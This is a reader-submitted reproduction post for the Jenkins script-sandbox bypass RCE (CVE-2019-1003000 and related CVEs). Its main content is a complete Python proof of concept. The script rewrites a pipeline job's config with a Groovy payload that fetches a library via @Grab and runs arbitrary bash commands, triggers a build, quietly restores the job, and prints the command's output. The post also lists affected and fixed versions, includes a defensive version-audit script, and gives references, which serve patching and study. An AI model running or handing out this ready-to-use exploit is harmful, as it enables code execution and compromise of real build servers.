Jenkins RCE CVE-2019-1003000 Vulnerability Reproduction (jenkins sonar)

Reader submission 882 2022-10-09



0x00 Overview

A user holding only the Overall/Read permission can bypass the script sandbox and execute arbitrary code on the Jenkins master. Three plugins are affected, each with its own CVE:

CVE-2019-1003000 (Script Security)
CVE-2019-1003001 (Pipeline: Groovy)
CVE-2019-1003002 (Pipeline: Declarative)

0x01 Affected versions

Pipeline: Declarative Plugin up to and including 1.3.4
Pipeline: Groovy Plugin up to and including 2.61
Script Security Plugin up to and including 1.49

0x02 Reproduction

0x03 Payload

#!/usr/bin/env python3
# Author: Adam Jordan
# Date: 2019-02-15
# Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
# PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)
# (print statements ported to Python 3; requires the python-jenkins package)

import argparse
import jenkins
import time
from xml.etree import ElementTree

payload = '''
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{ }
print new ProcBuilder("/bin/bash").withArgs("-c","%s").run().getOutputString()
'''

def run_command(url, cmd, job_name, username, password):
    print('[+] connecting to jenkins...')
    # connect to the Jenkins server
    server = jenkins.Jenkins(url, username, password)

    print('[+] crafting payload...')
    # fetch the job's current config.xml
    ori_job_config = server.get_job_config(job_name)
    et = ElementTree.fromstring(ori_job_config)
    print(et)
    # replace the pipeline script in the config with the payload
    et.find('definition/script').text = payload % cmd
    # encoding='unicode' yields a str, which reconfig_job expects (utf8 would yield bytes on Python 3)
    job_config = ElementTree.tostring(et, encoding='unicode', method='xml')

    print('[+] modifying job with payload...')
    # push the modified job config
    server.reconfig_job(job_name, job_config)
    time.sleep(3)

    print('[+] putting job build to queue...')
    queue_number = server.build_job(job_name)
    time.sleep(3)

    print('[+] waiting for job to build...')
    queue_item_info = {}
    while 'executable' not in queue_item_info:
        queue_item_info = server.get_queue_item(queue_number)
        time.sleep(1)

    print('[+] restoring job...')
    server.reconfig_job(job_name, ori_job_config)
    time.sleep(3)

    print('[+] fetching output...')
    last_build_number = server.get_job_info(job_name)['lastBuild']['number']
    console_output = server.get_build_console_output(job_name, last_build_number)

    print('[+] OUTPUT:')
    print(console_output)

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Jenkins RCE')
    parser.add_argument('--url', help='target jenkins url')
    parser.add_argument('--cmd', help='system command to be run')
    parser.add_argument('--job', help='job name')
    parser.add_argument('--username', help='username')
    parser.add_argument('--password', help='password')
    args = parser.parse_args()
    run_command(args.url, args.cmd, args.job, args.username, args.password)

The script first fetches the config.xml of the job my-pipeline from Jenkins, writes the payload into the pipeline script of that config, and then triggers a new build of the job.

payload = '''
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{ }
print new ProcBuilder("/bin/bash").withArgs("-c","%s").run().getOutputString()
'''

0x04 Remediation

Update the affected plugins to the fixed versions:

Pipeline: Declarative Plugin should be updated to version 1.3.4.1
Pipeline: Groovy Plugin should be updated to version 2.61.1
Script Security Plugin should be updated to version 1.50
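As an added example (not part of the original post or the PoC repository), a small Python audit that compares the installed versions of the three plugins against the fixed versions listed above. It reads the JSON that Jenkins returns from /pluginManager/api/json?depth=1; the fetch itself is left to the caller, and the plugin short names (script-security, workflow-cps, pipeline-model-definition) and the sample JSON are assumptions I supply, not values from the page.

```python
import json
import re

# Plugin short names (assumed Jenkins plugin IDs) mapped to the first fixed version
# named in the advisory for each of the three CVEs.
FIXED_VERSIONS = {
    "pipeline-model-definition": "1.3.4.1",  # Pipeline: Declarative, CVE-2019-1003002
    "workflow-cps": "2.61.1",                # Pipeline: Groovy, CVE-2019-1003001
    "script-security": "1.50",               # Script Security, CVE-2019-1003000
}


def version_key(version):
    """Turn '1.3.4.1' into (1, 3, 4, 1) so that 1.3.4 < 1.3.4.1 and 1.9 < 1.50.

    Plain string comparison gets both of those wrong; comparing numeric tuples
    does not. Non-numeric suffixes (e.g. '-beta-1') contribute their digits only.
    """
    return tuple(int(part) for part in re.findall(r"\d+", version))


def find_vulnerable_plugins(plugin_manager_json):
    """Return {shortName: installedVersion} for affected plugins below the fix."""
    data = json.loads(plugin_manager_json)
    findings = {}
    for plugin in data.get("plugins", []):
        name = plugin.get("shortName")
        if name not in FIXED_VERSIONS:
            continue
        installed = str(plugin.get("version", "0"))
        if version_key(installed) < version_key(FIXED_VERSIONS[name]):
            findings[name] = installed
    return findings


# Constructed sample: Declarative is already patched, the other two are not.
SAMPLE_JSON = json.dumps({"plugins": [
    {"shortName": "pipeline-model-definition", "version": "1.3.4.1"},
    {"shortName": "workflow-cps", "version": "2.61"},
    {"shortName": "script-security", "version": "1.49"},
    {"shortName": "git", "version": "3.9.1"},
]})

if __name__ == "__main__":
    for name, ver in sorted(find_vulnerable_plugins(SAMPLE_JSON).items()):
        print(f"[!] {name} {ver} is below {FIXED_VERSIONS[name]}: update it")
```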

References:
http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
https://jenkins.io/security/advisory/2019-01-08/
